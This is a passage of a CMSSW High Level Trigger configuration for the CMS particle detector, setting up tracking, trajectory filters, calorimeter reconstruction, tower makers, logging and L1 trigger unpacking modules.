cms.untracked.bool( True )\n)\nprocess.WithTrackAngle = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"WithTrackAngle\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.ZdcHardcodeGeometryEP = cms.ESProducer( \"ZdcHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.bJetRegionalTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"bJetRegionalTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"bJetRegionalTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.bJetRegionalTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"bJetRegionalTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 1.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.ckfBaseTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"ckfBaseTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.hcalRecAlgos = cms.ESProducer( \"HcalRecAlgoESProducer\",\n SeverityLevels = cms.VPSet( \n cms.PSet( Level = cms.int32( 0 ),\n RecHitFlags = cms.vstring( '' ),\n ChannelStatus = cms.vstring( '' )\n )\n ),\n RecoveredRecHitBits = cms.vstring( '' ),\n appendToDataLabel = cms.string( \"\" ),\n DropChannelStatusBits = cms.vstring( '' )\n)\nprocess.hcal_db_producer = cms.ESProducer( \"HcalDbProducer\",\n appendToDataLabel = cms.string( \"\" ),\n dump = cms.untracked.vstring( '' )\n)\nprocess.hltCkfTrajectoryBuilderMumu = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltCkfTrajectoryBuilderMumu\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"hltCkfTrajectoryFilterMumu\" ),\n maxCand = cms.int32( 3 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = 
cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltCkfTrajectoryFilterMumu = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltCkfTrajectoryFilterMumu\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 3.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 5 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.hltKFFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltKFFitter\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltKFFittingSmoother = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltKFFittingSmoother\" ),\n Fitter = cms.string( \"hltKFFitter\" ),\n Smoother = cms.string( \"hltKFSmoother\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltKFSmoother = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltKFSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.mixedlayerpairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"MixedLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg',\n 'FPix2_pos+TEC1_pos',\n 'FPix2_pos+TEC2_pos',\n 'TEC1_pos+TEC2_pos',\n 'TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC1_neg',\n 'FPix2_neg+TEC2_neg',\n 'TEC1_neg+TEC2_neg',\n 'TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 1 ),\n useRingSlector = cms.bool( True )\n )\n)\nprocess.muonCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"muonCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n 
minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n chargeSignificance = cms.double( -1.0 )\n )\n)\nprocess.navigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"SimpleNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.pixellayerpairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"PixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( )\n)\nprocess.pixellayertriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"PixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( )\n)\nprocess.sistripconn = cms.ESProducer( \"SiStripConnectivity\" )\nprocess.softLeptonByDistance = cms.ESProducer( \"LeptonTaggerByDistanceESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n distance = cms.double( 0.5 )\n)\nprocess.softLeptonByPt = cms.ESProducer( \"LeptonTaggerByPtESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ipSign = cms.string( \"any\" )\n)\nprocess.trackCounting3D2nd = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 2 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nprocess.trajBuilderL3 = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"trajBuilderL3\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = 
cms.string( \"trajFilterL3\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.trajFilterL3 = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"trajFilterL3\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 7 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.trajectoryCleanerBySharedHits = cms.ESProducer( \"TrajectoryCleanerESProducer\",\n ComponentName = cms.string( \"TrajectoryCleanerBySharedHits\" ),\n appendToDataLabel = cms.string( \"\" ),\n fractionShared = cms.double( 0.5 )\n)\n\nprocess.DQM = cms.Service( \"DQM\",\n)\nprocess.DQMStore = cms.Service( \"DQMStore\",\n)\nprocess.DTDataIntegrityTask = cms.Service( \"DTDataIntegrityTask\",\n getSCInfo = cms.untracked.bool( True ),\n hltMode = cms.untracked.bool( True )\n)\nprocess.FUShmDQMOutputService = cms.Service( \"FUShmDQMOutputService\",\n lumiSectionsPerUpdate = cms.double( 1.0 ),\n useCompression = cms.bool( True ),\n compressionLevel = cms.int32( 1 ),\n)\nprocess.MessageLogger = cms.Service( \"MessageLogger\",\n destinations = cms.untracked.vstring( 'warnings',\n 'errors',\n 'infos',\n 'debugs',\n 'cout',\n 'cerr',\n 'log4cplus' ),\n categories = cms.untracked.vstring( 'FwkJob',\n 'FwkReport',\n 'FwkSummary',\n 'Root_NoDictionary' ),\n statistics = cms.untracked.vstring( 'cerr' ),\n cerr = cms.untracked.PSet( \n INFO = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n noTimeStamps = cms.untracked.bool( False ),\n FwkReport = cms.untracked.PSet( \n reportEvery = cms.untracked.int32( 1 ),\n limit = cms.untracked.int32( 0 )\n ),\n default = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) ),\n Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkSummary = cms.untracked.PSet( \n reportEvery = cms.untracked.int32( 1 ),\n limit = cms.untracked.int32( 10000000 )\n ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n cout = cms.untracked.PSet( \n threshold = cms.untracked.string( \"ERROR\" ),\n ),\n errors = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n warnings = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n infos = cms.untracked.PSet( \n Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n debugs = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n fwkJobReports = cms.untracked.vstring( 'FrameworkJobReport' ),\n FrameworkJobReport = cms.untracked.PSet( \n default = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) )\n ),\n)\nprocess.MicroStateService = cms.Service( \"MicroStateService\",\n)\nprocess.ModuleWebRegistry = cms.Service( \"ModuleWebRegistry\",\n)\nprocess.PrescaleService = cms.Service( 
\"PrescaleService\",\n lvl1DefaultLabel = cms.untracked.string( \"0\" ),\n lvl1Labels = cms.vstring( '0',\n '1',\n '2',\n '3',\n '4',\n '5',\n '6',\n '7',\n '8',\n '9',\n '10' ),\n prescaleTable = cms.VPSet( \n )\n)\nprocess.TimeProfilerService = cms.Service( \"TimeProfilerService\",\n)\nprocess.UpdaterService = cms.Service( \"UpdaterService\",\n)\nprocess.hltGetRaw = cms.EDAnalyzer( \"HLTGetRaw\",\n RawDataCollection = cms.InputTag( \"source\" )\n)\nprocess.hltTriggerType = cms.EDFilter( \"HLTTriggerTypeFilter\",\n SelectedTriggerType = cms.int32( 1 )\n)\nprocess.hltEventNumber = cms.EDFilter( \"HLTEventNumberFilter\",\n period = cms.uint32( 4096 ),\n invert = cms.bool( True )\n)\nprocess.hltGtDigis = cms.EDProducer( \"L1GlobalTriggerRawToDigi\",\n DaqGtInputTag = cms.InputTag( \"source\" ),\n DaqGtFedId = cms.untracked.int32( 813 ),\n ActiveBoardsMask = cms.uint32( 0xffff ),\n UnpackBxInEvent = cms.int32( 1 )\n)\nprocess.hltGctDigis = cms.EDProducer( \"GctRawToDigi\",\n inputLabel = cms.InputTag( \"source\" ),\n gctFedId = cms.int32( 745 ),\n hltMode = cms.bool( True ),\n unpackSharedRegions = cms.bool( False ),\n unpackerVersion = cms.uint32( 0 )\n)\nprocess.hltL1GtObjectMap = cms.EDProducer( \"L1GlobalTrigger\",\n GmtInputTag = cms.InputTag( \"hltGtDigis\" ),\n GctInputTag = cms.InputTag( \"hltGctDigis\" ),\n CastorInputTag = cms.InputTag( \"castorL1Digis\" ),\n ProduceL1GtDaqRecord = cms.bool( False ),\n ProduceL1GtEvmRecord = cms.bool( False ),\n ProduceL1GtObjectMapRecord = cms.bool( True ),\n WritePsbL1GtDaqRecord = cms.bool( False ),\n ReadTechnicalTriggerRecords = cms.bool( True ),\n EmulateBxInEvent = cms.int32( 1 ),\n AlternativeNrBxBoardDaq = cms.uint32( 0 ),\n AlternativeNrBxBoardEvm = cms.uint32( 0 ),\n BstLengthBytes = cms.int32( -1 ),\n TechnicalTriggersInputTags = cms.VInputTag( 'simBscDigis' ),\n RecordLength = cms.vint32( 3, 0 )\n)\nprocess.hltL1extraParticles = cms.EDProducer( \"L1ExtraParticlesProd\",\n produceMuonParticles = cms.bool( True ),\n muonSource = cms.InputTag( \"hltGtDigis\" ),\n produceCaloParticles = cms.bool( True ),\n isolatedEmSource = cms.InputTag( 'hltGctDigis','isoEm' ),\n nonIsolatedEmSource = cms.InputTag( 'hltGctDigis','nonIsoEm' ),\n centralJetSource = cms.InputTag( 'hltGctDigis','cenJets' ),\n forwardJetSource = cms.InputTag( 'hltGctDigis','forJets' ),\n tauJetSource = cms.InputTag( 'hltGctDigis','tauJets' ),\n etTotalSource = cms.InputTag( \"hltGctDigis\" ),\n etHadSource = cms.InputTag( \"hltGctDigis\" ),\n etMissSource = cms.InputTag( \"hltGctDigis\" ),\n htMissSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingEtSumsSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingBitCountsSource = cms.InputTag( \"hltGctDigis\" ),\n centralBxOnly = cms.bool( True ),\n ignoreHtMiss = cms.bool( False )\n)\nprocess.hltOfflineBeamSpot = cms.EDProducer( \"BeamSpotProducer\" )\nprocess.hltPreFirstPath = cms.EDFilter( \"HLTPrescaler\" )\nprocess.hltBoolFirstPath = cms.EDFilter( \"HLTBool\",\n result = cms.bool( False )\n)\nprocess.hltEcalRawToRecHitFacility = cms.EDProducer( \"EcalRawToRecHitFacility\",\n sourceTag = cms.InputTag( \"source\" ),\n workerName = cms.string( \"\" )\n)\nprocess.hltEcalRegionalRestFEDs = cms.EDProducer( \"EcalRawToRecHitRoI\",\n sourceTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n type = cms.string( \"all\" ),\n doES = cms.bool( False ),\n sourceTag_es = cms.InputTag( \"NotNeededoESfalse\" ),\n MuJobPSet = cms.PSet( ),\n JetJobPSet = cms.VPSet( \n ),\n EmJobPSet = cms.VPSet( \n ),\n CandJobPSet = cms.VPSet( \n 
)\n)\nprocess.hltEcalRecHitAll = cms.EDProducer( \"EcalRawToRecHitProducer\",\n lazyGetterTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n sourceTag = cms.InputTag( \"hltEcalRegionalRestFEDs\" ),\n splitOutput = cms.bool( True ),\n EBrechitCollection = cms.string( \"EcalRecHitsEB\" ),\n EErechitCollection = cms.string( \"EcalRecHitsEE\" ),\n rechitCollection = cms.string( \"NotNeededsplitOutputTrue\" )\n)\nprocess.hltHcalDigis = cms.EDProducer( \"HcalRawToDigi\",\n InputLabel = cms.InputTag( \"source\" ),\n UnpackCalib = cms.untracked.bool( True ),\n UnpackZDC = cms.untracked.bool( True ),\n firstSample = cms.int32( 0 ),\n lastSample = cms.int32( 9 ),\n FilterDataQuality = cms.bool( True )\n)\nprocess.hltHbhereco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HBHE\" ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 )\n)\nprocess.hltHfreco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HF\" ),\n firstSample = cms.int32( 3 ),\n samplesToAdd = cms.int32( 1 ),\n correctForTimeslew = cms.bool( False ),\n correctForPhaseContainment = cms.bool( False ),\n correctionPhaseNS = cms.double( 0.0 )\n)\nprocess.hltHoreco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HO\" ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 )\n)\nprocess.hltTowerMakerForAll = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.09 ),\n EEThreshold = cms.double( 0.45 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.9 ),\n HESThreshold = cms.double( 1.4 ),\n HEDThreshold = cms.double( 1.4 ),\n HOThreshold0 = cms.double( 1.1 ),\n HOThresholdPlus1 = cms.double( 1.1 ),\n HOThresholdMinus1 = cms.double( 1.1 ),\n HOThresholdPlus2 = cms.double( 1.1 ),\n HOThresholdMinus2 = cms.double( 1.1 ),\n HF1Threshold = cms.double( 1.2 ),\n HF2Threshold = cms.double( 1.8 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 999 ),\n EcalAcceptSeverityLevel = cms.uint32( 1 ),\n UseHcalRecoveredHits = cms.bool( True ),\n UseEcalRecoveredHits = cms.bool( True ),\n EBGrid = 
cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRecHitAll:EcalRecHitsEB','hltEcalRecHitAll:EcalRecHitsEE' )\n)\nprocess.hltTowerMakerForEcal = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.09 ),\n EEThreshold = cms.double( 0.45 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.9 ),\n HESThreshold = cms.double( 1.4 ),\n HEDThreshold = cms.double( 1.4 ),\n HOThreshold0 = cms.double( 1.1 ),\n HOThresholdPlus1 = cms.double( 1.1 ),\n HOThresholdMinus1 = cms.double( 1.1 ),\n HOThresholdPlus2 = cms.double( 1.1 ),\n HOThresholdMinus2 = cms.double( 1.1 ),\n HF1Threshold = cms.double( 1.2 ),\n HF2Threshold = cms.double( 1.8 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 999 ),\n EcalAcceptSeverityLevel = cms.uint32( 1 ),\n UseHcalRecoveredHits = cms.bool( True ),\n UseEcalRecoveredHits = cms.bool( True ),\n EBGrid = cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRecHitAll:EcalRecHitsEB','hltEcalRecHitAll:EcalRecHitsEE' )\n)\nprocess.hltBoolEnd = cms.EDFilter( \"HLTBool\",\n result = cms.bool( True )\n)\nprocess.HLTHcalSimpleRecHitFilter = cms.EDFilter( \"HLTHcalSimpleRecHitFilter\",\n threshold = cms.double( 12.0 ),\n HFRecHitCollection = cms.InputTag( \"hltHfreco\" ),\n maskedChannels = cms.vint32( 8137, 8141, 8147, 8149, 8500 )\n)\nprocess.hltTriggerSummaryAOD = cms.EDProducer( \"TriggerSummaryProducerAOD\",\n processName = cms.string( \"@\" )\n)\nprocess.hltPreTriggerSummaryRAW = cms.EDFilter( \"HLTPrescaler\" )\nprocess.hltTriggerSummaryRAW = cms.EDProducer( \"TriggerSummaryProducerRAW\",\n processName = cms.string( \"@\" )\n)\nprocess.hltBoolFinalPath = cms.EDFilter( \"HLTBool\",\n result = cms.bool( False )\n)\nprocess.hltL1GtTrigReport = cms.EDAnalyzer( \"L1GtTrigReport\",\n 
